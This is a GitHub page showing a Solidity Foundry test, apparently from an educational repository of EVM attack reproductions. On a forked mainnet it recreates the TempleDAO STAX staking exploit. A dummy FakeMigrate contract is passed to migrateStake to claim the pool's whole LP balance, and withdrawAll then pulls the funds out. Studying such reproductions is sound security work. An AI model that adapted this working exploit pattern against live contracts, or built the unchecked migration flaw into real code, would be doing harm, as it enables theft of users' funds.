This repository has been archived by the owner on May 27, 2024. It is now read-only.
forked from coinspect/learn-evm-attacks
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathTempleDao.attack.sol
63 lines (50 loc) · 2.16 KB
/
TempleDao.attack.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;
import "forge-std/Test.sol";
import {TestHarness} from "../../TestHarness.sol";
import {IERC20} from '../../interfaces/IERC20.sol';
import {TokenBalanceTracker} from '../../modules/TokenBalanceTracker.sol';
interface IStax {
function migrateStake(address oldStaking, uint256 amount) external;
function withdrawAll(bool claim) external;
function balanceOf(address) external returns (uint256);
}
contract Exploit_TempleDAO is TestHarness, TokenBalanceTracker {
IERC20 internal staxLpToken = IERC20(0xBcB8b7FC9197fEDa75C101fA69d3211b5a30dCD9);
IStax internal stax = IStax(0xd2869042E12a3506100af1D192b5b04D65137941);
function setUp() external {
cheat.createSelectFork('mainnet', 15725066);
cheat.deal(address(this), 0 ether);
addTokenToTracker(address(staxLpToken));
updateBalanceTracker(address(this));
updateBalanceTracker(address(stax));
}
function test_attack() external {
console.log('------- INITIAL STATUS -------');
console.log('Attacker balances');
logBalances(address(this));
console.log('Stax Pool balances');
logBalances(address(stax));
uint256 balanceBefore = stax.balanceOf(address(this));
console.log('------- STEP 1: MIGRATE -------');
address migrationTarget = address(new FakeMigrate{salt: bytes32(0)}());
uint256 staxBalance = staxLpToken.balanceOf(address(stax));
stax.migrateStake(migrationTarget, staxBalance);
console.log('Attacker balances');
logBalances(address(this));
console.log('Stax Pool balances');
logBalances(address(stax));
console.log('------- STEP 2: WITHDRAW -------');
stax.withdrawAll(false);
console.log('Attacker balances');
logBalances(address(this));
console.log('Stax Pool balances');
logBalances(address(stax));
uint256 balanceAfter = stax.balanceOf(address(this));
assertGe(balanceAfter, balanceBefore);
}
}
contract FakeMigrate {
// Migration callback
function migrateWithdraw(address staker, uint256 amount) external {}
}